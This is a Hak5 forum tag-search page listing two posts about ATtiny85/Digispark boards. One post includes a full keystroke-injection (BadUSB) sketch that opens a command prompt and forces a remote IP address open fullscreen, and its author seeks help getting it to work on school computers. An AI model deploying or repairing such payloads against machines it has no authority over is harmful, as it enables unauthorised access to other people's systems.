Jump to content

Search the Community

Showing results for tags 'attiny85'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 2 results

  1. With a digispark code so i could block internet connections and login into any windows.
  2. My code wont work at school, y? I bout a attiny85 on aliexpress, put in into ma pc, everything worked fine and still on my laptop i can write code on it. But when i connect the badusb to a school pc nothing happens the same on my laptop, but last i tested it worked on my pc. Can uu halp!!!11one #include "DigiKeyboard.h" // Delay between keystrokes #define KEYSTROKE_DELAY 1000 #define KEY_ESC 0x29 // Escape #define KEY_MODIFIER_LEFT_GUI 0x08 int iterationCounter = 0; void setup() { // initialize the digital pin as an output. pinMode(0, OUTPUT); //LED on Model B pinMode(1, OUTPUT); //LED on Model A digitalWrite(0, LOW); // turn the LED off by making the voltage LOW digitalWrite(1, LOW); // don't need to set anything up to use DigiKeyboard } void loop() { DigiKeyboard.update(); if (iterationCounter == 0) { // this is generally not necessary but with some older systems it seems to // prevent missing the first character after a delay: DigiKeyboard.sendKeyStroke(0); // It's better to use DigiKeyboard.delay() over the regular Arduino delay() // if doing keyboard stuff because it keeps talking to the computer to make // sure the computer knows the keyboard is alive and connected DigiKeyboard.delay(KEYSTROKE_DELAY); DigiKeyboard.sendKeyStroke(KEY_ESC, KEY_MODIFIER_LEFT_GUI); DigiKeyboard.delay(KEYSTROKE_DELAY); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run DigiKeyboard.delay(500); DigiKeyboard.print("cmd"); DigiKeyboard.delay(KEYSTROKE_DELAY); DigiKeyboard.print("start /max 88.193.204.254"); DigiKeyboard.delay(KEYSTROKE_DELAY); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(KEYSTROKE_DELAY); DigiKeyboard.sendKeyStroke(KEY_F11); DigiKeyboard.delay(KEYSTROKE_DELAY); } delay(1000); iterationCounter++; }
×
×
  • Create New...